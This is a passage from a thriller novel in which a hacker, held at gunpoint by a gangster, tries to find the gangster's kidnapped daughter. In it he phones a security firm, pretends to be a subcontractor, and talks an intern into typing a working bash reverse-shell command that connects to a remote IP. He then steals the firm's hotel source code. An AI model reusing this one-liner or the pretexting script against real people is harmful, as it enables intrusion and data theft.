<div class="chapsection">
<p>
<em><span class="caplead">Thump-Thump! Thump thump! thump thump!</span> Thump-thump thump thump thump-thump … </em>
</p>
<p>
Danny vaguely recognized the music.
</p>
<p>
His eyes opened slowly. The angle of the daylight hinted at an hour well past noon.
</p>
<p>
When he sat up, he felt the stinging lance of pain across his upper back. He reached to touch the shoulder wound, and remembered that his hand was still sensitive from the burn. His injuries served as unavoidable reminders of the horrors of the previous twenty-four hours.
</p>
<p>
He also saw a trail of thin claw-marks dug into his skin from his chest to his abdomen. He smiled. Not everything about the previous day had been so bad after all.
</p>
<p>
He stood up and donned pajamas. He took his time. He no longer had a job to worry about showing up late for. Most importantly, he had a brilliant and beautiful young woman playing <em>Dance Dance Revolution</em> in the next room.
</p>
<p>
As he opened the bedroom door, the stench of acetone and kerosene stung his nostrils. The kitchen still contained the cluttered trappings of an impromptu biochemical laboratory. Powders still lay spilt across the floor, and wires still protruded from behind the stove. Near the sink, he saw several new items: metal buckets with stirring rods alongside bottles of nail polish remover, industrial-strength drain cleaner, and heating oil.
</p>
<p>
The music and the thumping stopped.
</p>
<p>
“If you see your shadow,” said Tina, “do we get six weeks more winter?”
</p>
<p>
“Good morning,” Danny said with a froggy voice as he emerged. He stretched his arms and ribs, his joints popping with the motion. “Or afternoon. How long was I out?”
</p>
<p>
“It’s almost three,” said Tina. “I was getting bored!”
</p>
<p>
He bobbed his head toward the kitchen. “So… I happen to be absolutely starving. I see you’ve been cooking?”
</p>
<p>
“Eating anything in here would be an astonishingly bad idea,” she replied.
</p>
<p>
“Aww, darn. And here I was looking forward to a nice hearty bacteria stew. How’s the broth doing?”
</p>
<p>
Her mouth formed a boastful grin. She pointed to the stove. “See for yourself!” 
</p>
<p>
Danny approached the stove. As he removed the lid, he noticed that the sweet, salty smell of the broth had been completely overtaken by a much stronger odor &mdash; the fetid stink of brackish swamp water. Inside, the broth was a rancid yellowish-brown soup, thick with fatty blobs of viscous slime.
</p>
<p>
“Looks delicious,” Danny said while suppressing a gag. He put the lid back on.
</p>
<p>
Tina bounced toward the kitchen and stood behind the granite counter. “It’s in an exponential growth phase. As long as there are still nutrients, the bacteria can double their population every half hour.”
</p>
<p>
Danny worked the math. “So after ten hours, they’d double twenty times. Two to the twentieth is a million and change. So that tiny speck you started with has multiplied by a factor of over a million by now. That’s… a lot.”
</p>
<p>
“That’s biology!” Tina said.
</p>
<p>
Danny chuckled at her. “You’re kind of proud of yourself right now, aren’t you?”
</p>
<p>
“Well, I damn well should be!” she replied. “Considering how amazing I am and everything! Seriously! I’ve been stuck behind a reception desk for almost two years, when the whole time what I’m really meant to be doing is <em>this</em>, this right here. Behold my awesome powers!” She lifted her head theatrically and splayed her black-nailed fingers.
</p>
<p>
Danny walked up to her. She wrapped her arms around his pajama-clad waist. Her bright, joyful eyes looked welcomingly into his. “So, when will we know if it works?” he asked. “If it actually makes the… you know… the drug?”
</p>
<p>
She tilted her head toward the kitchen counter. “We already do.”
</p>
<p>
Danny followed her gaze. Between the scattered glassware, he saw a small cleared area of his glossy granite countertop. There, standing out against the blackness, stretched several thin, delicate parallel lines of fine white powder. He slid reluctantly out of her embrace and leaned down to examine them closely. “Whoa…”
</p>
<p>
“I did some shopping while you were asleep,” said Tina. “I picked up some glutamate from Super Supplements. Everything else I found at Home Depot. I paid for everything with cash, so there’s no trail. I guess hanging out with you freaky hacker guys is teaching me a thing or two.”
</p>
<p>
He turned away from the fresh narcotics on the counter and returned his full attention to the beautiful girl by his side. “You know something?” he said with a devilish grin.
</p>
<p>
“What?” she asked, unfolding her arms and welcoming his approach. 
</p>
<p>
He put his hands on her waist. “I’m beginning to think,” he said, “that maybe you’re kind of smart. For a girl, anyway.”
</p>
<p>
She pressed her body against his. “You’re a dick,” she said with a sparkle in her eyes.
</p>
<p>
Their lips met in a kiss that broke his mind free of the bonds of gravity. His heart raced. He deftly moved his mouth down the side of her neck.
</p>
<p>
In a voice soft and breathy, Tina asked him, “Have you ever tried it, by the way?”
</p>
<p>
Danny paused long enough to ask, “Tried what?” He resumed kissing his way down to her collar and slowly began unbuttoning her shirt.
</p>
<p>
“Cocaine,” she answered.
</p>
<p>
“Me? No. No way. Have you?”
</p>
<p>
“Eh, I’ve indulged,” she said, her fingertips running along the back of his neck. “But I think my clubbing days are behind me.”
</p>
<p>
He took her head in his hand and turned it to one side to gain access to an earlobe. “What does it feel like?” he whispered between nibbles.
</p>
<p>
Tina mused for a second. “Kind of like this,” she answered.
</p>
<p>
“I’m definitely never, ever going to touch the stuff, then.”
</p>
<p>
“What, you don’t like it?” she teased.
</p>
<p>
“I’d never be able to stop.”
</p>
<p>
Kissing continued, vigorous and passionate. Fingers glided through hair and brushed across skin. A bra strap slid down over a shoulder. 
</p>
<p>
The doorbell rang.
</p>
<p>
Danny and Tina looked at the door simultaneously, then at each other with matching quizzical expressions.
</p>
<p>
“Did you order pizza or something?” Danny asked her.
</p>
<p>
Tina shook her head.
</p>
<p>
Danny headed toward the door. He looked through the peephole. There was nobody outside. “What the hell?” he mumbled. Confused, he flipped the deadbolt, turned the knob, and began pulling it open. “Hello…?”
</p>
<p>
An immense dark blur spun out quickly from beside the door, outside the view of the peephole. In an instant, it hurled through the doorway. The figure’s momentum thrust the door back against Danny. He fell backward, landing hard on the smooth wood floor.
</p>
<p>
He looked up to try to comprehend what had just happened.  What he saw was the long black barrel of a handgun pointed straight into his face. And on the other side of that gun, darkened to a silhouette in the light from the doorway, towered the massive shape of Sergey Mukhayev.
</p>
<p>
With spastic motions of his elbows and feet, he scurried backwards. Sergey followed him as he tried to clumsily scuttle along the hardwood floor, matching the pace of Danny’s flailing motions with his own slow, relentless footfall, advancing unstoppably like a stone golem. He kept the gun pointed squarely between Danny’s eyes as he marched into his home. Without taking his gaze off of Danny, the large Russian kicked the front door of the house closed behind him. 
</p>
<p>
From somewhere far away, Tina screamed. There was some kind of rummaging commotion coming from the kitchen.
</p>
<p>
Sergey’s gaze momentarily broke away from Danny. The Russian looked toward Tina and said dismissively, “Put that down. You will only hurt yourself.”
</p>
<p>
In the brief second of Sergey’s invasion, Tina had fled around the counter into the kitchen. She stood holding a large, sharp knife with both hands, pointing it at Sergey with as much courage and menace as she could muster &mdash; which was not a lot.
</p>
<p>
The hulking Russian ignored her. He towered over Danny like an enraged colossus and snarled, “Get up!”
</p>
<p>
Danny whimpered.
</p>
<p>
“I said stand up, you son of the bitch!” Sergey barked.
</p>
<p>
Danny struggled to his feet. “How… How did you…”
</p>
<p>
Sergey looked Danny in the eye, his lips curled and nostrils faring. He stepped so close that Danny could feel his breath and smell his sweat.
</p>
<p>
The Russian grabbed Danny by the throat and pinned him against the wall. Danny tried to pry the meaty claw off of his neck, but the Russian’s grip was as rigid as steel.
</p>
<p>
“You…” Sergey seethed. “It is all you! I am up in this ass because of you!”
</p>
<p>
Danny’s vision grew watery and distorted through tears of terror. “I… I’m sorry!” he squeezed out, his voice distorted through his constrained larynx. “It was just a job…”
</p>
<p>
Sergey looked at Danny with an expression typically used for things stuck to the bottom of a shoe. “You nearly killed my nephew. Twice,” he growled. “You tricked me into ordering lockdown. You blew up my factory, you got one of my soldiers killed, you got another badly wounded. And I am running out of cars!”
</p>
<p>
The paw around Danny’s neck was pinching critical vascular anatomy. His vision started to fade &mdash; colors dimmed, and the world seemed to flatten. Sergey’s voice sounded like it came from an echoing distance.
</p>
<p>
 “I have no more contact with my men because of you. I have no army, no telephones, no cash flow. I have only one thing now. One thing I am left with.” Sergey shoved the end of the silencer against Danny’s chest. “You. I have you. And you do not look like much. But I know you are one clever little shit. And, God willing, maybe that will be enough.”
</p>
<p>
“What do you want from me?” Danny whispered, barely conscious. He could feel the silenced muzzle pressing into his ribs. It was shaking.
</p>
<p>
And as Sergey looked into his eyes, Danny, with faltering sight, noticed something beyond the anger and contempt. Whether it was in the twitch of his lip or the crease of his brow, Danny sensed something deeply vulnerable in the large man’s face, far beneath the rage. Something scared and desperate.
</p>
<p>
“I would love nothing more than to kill you right now, clean and easy. But I need you,” said Sergey with a pained voice, “to save my daughter.”
</p>
</div>

<div class="chapsection">
<p>
<span class="caplead">Danny dropped hard into the chair</span> at the computer desk in his bedroom. The air-springs bounced beneath him.
</p>
<p>
Sergey leaned down over his shoulder, and said slowly into his ear, “We will have no funny business. I know you will find some sneaky way to use computer to call for help &mdash; you will try to type something smart that I won’t understand, yes? Well, let me tell you something. If I hear anybody come to this house… Anybody! Police. Friend. Neighbor. Newspaper delivery boy. Even stray cat. …Then I shoot you dead that moment. I will not even think about it. And then I will use her…” He gestured to Tina behind him, who sat tensely but passively on the bed. “…as hostage for me to escape. I am being clear to you?”
</p>
<p>
“Crystal,” Danny squeaked.
</p>
<p>
Sergey warily eyed the windows on Danny’s large monitor. “What kind of computer is this, anyway? It is not Windows, it is not Mac…”
</p>
<p>
“It’s Ubuntu,” Danny answered.
</p>
<p>
Sergey grunted disapprovingly. “This is what computer hackers use?”
</p>
<p>
“Actually, yeah…” 
</p>
<p>
The Russian snorted loudly. “Well then! Start it! Do the hacking!”
</p>
<p>
Danny stared blankly at the screen. “It… Um… It’s not… It doesn’t work like that… You’ve got to give me something to go on. Some kind of lead. What’s her name? Where was she last seen? How old is she?”
</p>
<p>
“Twelve,” the Russian answered. “She was at her dancing school. Teachers said she left for lunch and never came back.”
</p>
<p>
Without thinking, Danny asked, “So she’s just cutting class?”
</p>
<p>
As soon as he had said it, he flinched. He expected a fist to the temple and a loud Russian-accented lecture about how Sergey’s precious little angel was the sweetest, most well-behaved cherub in all of God’s Creation.
</p>
<p>
Instead, what he heard was a stifled, pained chuckle. “You have raised a daughter?” said Sergey, with what Danny swore was a smile.
</p>
<p>
Danny shook his head.
</p>
<p>
“It is true, she is always trying to get away with trouble,” the Russian said. “Just like her old man. But… There is a man in the city today. Old business colleague. Things went very bad between us many years ago. And in this business, when things go bad…” 
</p>
<p>
“I see…,” Danny said, wincing. He opened a web browser. The plain white expanse of the Google search page dominated the computer’s screen. “Let’s start with the obvious. What’s this man’s name?”
</p>
<p>
“He is called Ivan Zheleznov,” said Sergey. “In English, you write it ‘Z’, ‘h’…”
</p>
<p>
From behind them, on the bed, Tina suddenly said, “Wait, Iv&mdash;?” She cut herself off.
</p>
<p>
They both turned to her. Sergey asked pointedly, “You have heard about him?”
</p>
<p>
Tina hesitantly replied, “Is he from Saint Petersburg? Super rich? Owns companies all over the world?”
</p>
<p>
“Yes!” said Sergey. “You know this man?”
</p>
<p>
Tina said, “He’s staying at the Medina Gallante, in the Presidential Suite.”
</p>
<p>
Danny asked, “The big fancy lakeside hotel between Mercer and the 520 bridge?”
</p>
<p>
Tina nodded.
</p>
<p>
Danny turned back around to the computer and started typing.
</p>
<p>
Sergey continued staring at her. “How do you know this!?”
</p>
<p>
“I’m the one that booked the reservation,” Tina answered.
</p>
<p>
Sergey squinted in confusion for a few moments. “Oh! I know you now. You are office girl from Tungsten! We talked on telephone! Your name is Tina, yes?”
</p>
<p>
Tina nodded. “Yeah.”
</p>
<p>
Sergey added, “You busted Eugene’s lip with old computer keyboard.”
</p>
<p>
Tina turned her head away, looked innocently upward, and said, “Maybe.”
</p>
<p>
Danny browsed the hotel’s website. The screen showed a high-resolution slide show of large cedarwood rooms with floor-to-ceiling windows, a steak-and-seafood restaurant, and panoramas of mountains and evergreen forests.
</p>
<p>
“Christ, this place is <em>sick</em>,” said Danny. “It’s got its own boat dock in Lake Washington &mdash; they let guests take their yachts out for a spin. …Authentic Finnish saunas in the gym … And a helicopter pad on the roof, so guests can fly directly from Sea-Tac Airport on rental choppers.”
</p>
<p>
Sergey grabbed Danny by the arm. “He is in this place right now? Let’s go! We come to my home first, get weapons, get Eugene and Leo, then we get Rosie!”
</p>
<p>
Danny struggled against his pull. “Jesus, no! Sergey, that’s suicide! Look, the kind of people that stay at a hotel like this, they’re very high rollers. We’re talking ambassadors, heads of state, officers of multinational corporations… My point is, the security in a place like this is going to be state-of-the-art.”
</p>
<p>
“This does not scare me,” Sergey shrugged.
</p>
<p>
“It should,” replied Danny. “Let me put it in perspective for you. This hotel is in the Medina neighborhood &mdash; one of the richest districts in the country, and all the money is from technology. Bill Gates’s house is there. Jeff Bezos &mdash; the guy who created Amazon &mdash; <em>his</em> house is there. They have marine radar systems watching every single building along the shoreline to call out the coast guard if so much as a floating beach ball gets within 500 feet of anyone’s deck. They have cameras on every street corner that use image recognition software to scan every car that drives through the neighborhood. And this is just what it’s like on <em>public</em> property. Inside that hotel, there’s going to be world-class physical security systems, full-time guards, hotlines to SWAT teams, you name it. If you go in with guns blazing, you’ll be mowed down before you make it through the lobby.”
</p>
<p>
“So what do you suggest?” asked Sergey.
</p>
<p>
“I don’t know,” said Danny. “Let me think…”
</p>
<p>
Danny stared at the screen, clicking at random on the web page, looking for leads.
</p>
<p>
Tina spoke up behind them. “Can I ask you something? Why is this so complicated? Why don’t you just call the police?”
</p>
<p>
Sergey looked at her with frustration. “Do you think police would help <em>me</em>? Local police have been wanting to catch me on something for very long time. Even if miracle happened and they rescued her from Ivan, you know what they do then? Use her as bargaining chip against me. They make up some bureaucratic reason to put her in foster care, make sure I never see her again, pressure me to turn myself in. Do you know what kind of life is for girl her age in foster system? No, this is not what will happen to my Rosie!” 
</p>
<p>
With his face buried in the screen, Danny said, “Guys, I think I have an idea.”
</p>
<p>
“What is your plan?” asked Sergey.
</p>
<p>
“Well, the hotel’s security system must’ve been built by somebody…”
</p>
<p>
Sergey paused for a moment. “This is your big idea? You just realize that somebody built hotel security system?”
</p>
<p>
Danny shook his head. “No… Look, the process by which people build things is… Hold on, give me a minute…” Armed again with a Google search page, Danny typed:
</p>

<pre class="computer">
"press release" contract security "Medina Gallante"
</pre>

<p>
He scanned the results, dismissing most of them, investigating others. He altered the search query several times. He tried the Wayback Machine, the public result clips of LexisNexis, and a dozen different business blogs. After many silent minutes of searching, he found what he was looking for. Buried in a tech entrepreneur newsletter from several years prior, there appeared a blurb.
</p>

<div class="computer email">
SAN JOSE, CA &mdash; Carlos Gaeta, President of RockBox Digital Security Systems Co., is proud to announce the signing of a $17.2M contract with the luxury hotel Medina Gallante of Seattle, WA. RockBox will be providing a comprehensive package of digital security solutions, including full integration with the hotel’s reservation, billing, and access management systems.
<br/>
<br/>
</div>

<p>
“RockBox Digital Security Systems, in San Jose, California,” Danny noted aloud.
</p>
<p>
Several more minutes of study armed him with information about RockBox. From industry reports, press releases, and LinkedIn, he deduced that the company was about ten years old and had about 50 workers, about a dozen of whom were engineers. The company’s website listed its phone number.
</p>
<p>
Danny reached for his cellphone, plugged into a charger at the corner of his desk.
</p>
<p>
A mighty backhand upside his head nearly knocked him out of his chair.
</p>
<p>
“Ow! What the fuck!” he howled.
</p>
<p>
Sergey glared at him. “What do you think you are doing? You think I let you make telephone call?”
</p>
<p>
“Look, you want me to help you or not?” Danny protested.
</p>
<p>
Sergey snorted. “Fine. But you must keep it on speakerphone.”
</p>
<p>
With a nod, Danny began dialing.
</p>
<p>
Sergey watched Danny work the phone, and narrowed his eyes. “What is strange code you are putting in before the phone number?”
</p>
<p>
“It’s star-six-seven. It’s to block caller ID. Now, quiet, it’s ringing.” He activated the speakerphone and laid the cellphone on his desk.
</p>
<p>
An older woman’s voice greeted the line. “RockBox Digital Security. How may I direct your call?”
</p>
<p>
Danny took a deep breath and closed his eyes. In a tone of friendly familiarity, he said, “Hi there. This is Danny, from the Medina Gallante contract. Listen, I was just chatting with an engineer of yours a few minutes ago, and I was supposed to call him back but I don’t have his direct line. He was helping me out through a real jam, and I’m kind of stuck without him.”
</p>
<p>
“What was his name, sir?” said the voice.
</p>
<p>
“I… uh… You know, I totally forget. I’m terrible with names,” Danny chuckled sheepishly. “I remember he’s really junior. Apparently a new hire, right out of college or something. Good kid, though.”
</p>
<p>
“Are you referring to Rick Easterday?” the lady suggested. “He’s our summer intern.”
</p>
<p>
“Rick! Yes! That was it!” Danny bluffed.
</p>
<p>
“I’ll put you through,” said the woman.
</p>
<p>
The line went silent for a few moments. Danny took another few deep breaths and wiped his face with both hands. This acting business did not come naturally to him.
</p>
<p>
A young man’s voice answered, “Hello?”
</p>
<p>
“Rick! Hello! This is Danny, with Clay… uh… Prismatic Creations, up in Seattle. We were subcontractors on the Medina Gallante account a couple years back. It’s a big snazzy hotel that you guys built the security system for.”
</p>
<p>
“Uh… What can I do for you?” said the young man’s voice, still slightly squeaky with adolescence.
</p>
<p>
Danny rolled back his shoulders and said, “Well, here’s the deal, Rick. I was trying to upgrade the operating system on Gallante’s computers, and I kind of screwed the pooch on the RockBox software. I didn’t test the upgrades first, and now I get this message saying, ‘Illegal operation’ and then a bunch of random numbers.”
</p>
<p>
The kid answered nervously, “I… uh… I don’t really know anything about that. I’ve only been here for a couple weeks. Here, let me get you one of the other engineers…”
</p>
<p>
Danny quickly said, “Wait! No, please don’t do that.”
</p>
<p>
The young man asked with deep confusion, “Why not?”
</p>
<p>
Danny paused for a moment, then answered with an embarrassed tone, “Look, Rick… Um… The truth is, I’m kind of facing a total shit-storm here. My company, Prismatic Creations, has a maintenance contract with this hotel. I’m sitting here at the customer’s site, and all their systems are down. Do you know how this makes me look? Now, the folks here at Gallante haven’t figured it out yet, but if they get wise, then I’m going to be in some seriously deep, deep shit. So I’d <em>really</em> like to keep this on the down-low. If you can help me without involving RockBox senior engineering staff, I’ll, like, owe you my life.”
</p>
<p>
The pimply voice on the line said, “I’m really sorry, sir, but I really don’t know anything about that system. I’ve never even heard of this, like, Gallante hotel project or whatever. I’d like to help you out, but I, uh, think you’re kind of screwed…”
</p>
<p>
“Listen, Rick,” Danny said smoothly. “I know a command you can use that’ll send a reset signal to the computers here. It might get everything back to normal for me, but it’ll only work if the command comes from a computer inside the RockBox firewall.”
</p>
<p>
“You mean like my workstation?” asked Rick.
</p>
<p>
“Yes, exactly,” said Danny. “What kind of computer is your workstation? Windows? Mac? Linux?”
</p>
<p>
“Mac,” said Rick. “Is that okay?” 
</p>
<p>
An evil grin crept onto Danny’s face. “It’s absolutely perfect…” He laid his hands upon his keyboard and began working. “Now, Rick, I’ll just need a minute here to prepare the machines for your signal…” A few large black windows opened on his computer screens. He typed several commands, sending rows of text cascading down his display. After about a minute, he said into the phone, “Hey Rick, you still there?”
</p>
<p>
The squeaky voice on the other end of the line hummed a greeting.
</p>
<p>
“So, listen, I’m ready for your signal,” Danny instructed. “I’ll need you to open a terminal window. You know what a terminal window is, right? It’s under Applications, Utilities.”
</p>
<p>
“Yes, got it,” the young man said.
</p>
<p>
Danny breathed a sigh of relief. “Good. Now, type the following command exactly as I say it…”
</p>

<pre class="computer">
exec /bin/sh 0&lt; /dev/tcp/69.17.116.124/1337 1&gt;&amp;0 2&gt;&amp;0
</pre>

<p>
On the other end of the line, young Rick dutifully repeated the code, following his instructions perfectly.
</p>
<p>
Messages began appearing in the windows on Danny’s display. He silently pumped his fist in a muted cheer of victory, and began typing more commands.
</p>
<p>
Rick squawked, “Did it work?”
</p>
<p>
“Like a charm, Rick!” said Danny. “Um… I owe you big! You’re a lifesaver!”
</p>
<p>
“It doesn’t look like it’s doing anything…” Rick said, confused.
</p>
<p>
“Oh, it’s doing stuff, alright!” Danny assured. “Don’t close that window, okay? I’ll terminate it when… I mean, it’ll terminate on its own when it’s done. Just leave it open.”
</p>
<p>
“Okay. Your systems are coming up now?” asked Rick.
</p>
<p>
Danny answered slowly while typing, “Oh yes. Everything is going quite well. Thank you, Rick. You’ve been very, very helpful.” He abruptly hung up the phone, and mumbled to himself with a condescending chuckle, “What a nice young man!”
</p>
<p>
Sergey stared at him in confusion. “What the hell was that?”
</p>
<p>
Danny, speaking slowly as he interlaced his words with his keystrokes, replied, “That was what we refer to in the industry as me being <em>fucking awesome</em>!”
</p>
<p>
Tina asked with astonishment, “What did you do that poor kid?”
</p>
<p>
“Taught him a valuable life lesson about trusting strangers on the phone,” said Danny. “That command I had him type opened a reverse shell &mdash; it gave me a back door into his workstation. Check it out &mdash; I’m controlling his machine right now. Here’s a list of files in his home directory… Here’s a list of currently running processes… Oh hey, look! Here’s an SVN repository…!”
</p>
<p>
“And this Rick kid doesn’t mind you running all these random apps on his Mac?” Tina asked in bewilderment.
</p>
<p>
“He doesn’t know,” said Danny as he continued typing. “I’m taking all the output from these programs, bouncing it through a webserver at Claymore Communications, and piping it over to my terminal here. Young Rick can’t see a thing.”
</p>
<p>
Sergey interjected, “How is any of this helping get back my Rosie?”
</p>
<p>
“I’ll tell you in a minute…” Danny disappeared into the nondescript expanse of text. The only sound in the room was the soft clicking of his keyboard. Finally, the stillness was broken with Danny announcing, “Jackpot.”
</p>
<p>
Danny moved his mouse cursor over a block of text. The line under the cursor read, “<span class="computer">Medina Gallante</span>”. 
</p>
<p>
“See this folder?” he explained. “It contains all of RockBox’s digital assets for the Gallante account. It’s got PDFs of the Gallante’s floor plans. User manuals. And all of the source code for the software that runs the hotel &mdash; keycards, cameras, reservations, billing, utility maintenance records…” He pulled a data stick out of his desk and plugged it his computer. “It’s all here. And it’s all ours.”
</p>
<p>
Sergey asked, “And with this you can get me into hotel?”
</p>
<p>
“With this, we can perform whitebox analysis of their integrated security framework,” Danny explained. “If we can find an exploitable flaw anywhere in the code base, we might be able to take over the entire system. No code project is ever completely free of defects, especially not one with this many different components and built by this many different people. There has to be a chink somewhere in this armor. It’s just a matter of finding it.”
</p>
<p>
“How fast can you do this?” Sergey demanded.
</p>
<p>
“Me? Alone? Not nearly fast enough,” said Danny.
</p>
<p>
“You need how much time? A day? Two days?”
</p>
<p>
Danny laughed humorlessly. “Sergey, something like this could take months.”
</p>
<p>
“You are full of shit,” Sergey grumbled. “You are supposed to be super smart. How can it take so long?”
</p>
<p>
In response, Danny loaded one of the source code files into an editor and expanded it to full-screen. Countless multicolored blocks of text overwhelmed the display. “Can <em>you</em> read that?”
</p>
<p>
“This is what you are for,” Sergey retorted.
</p>
<p>
Danny shook his head. “Looking for defects in source code is as much an art as it is a science. I can’t do this alone. I need to bring more people into this.”
</p>
<p>
Sergey looked at him coldly. Hesitantly, he said, “There is no other choice, is there? Very well. You need help? Go get it.”
</p>
<p>
Danny nodded. “I know just the man for the job.”
</p>
</div>
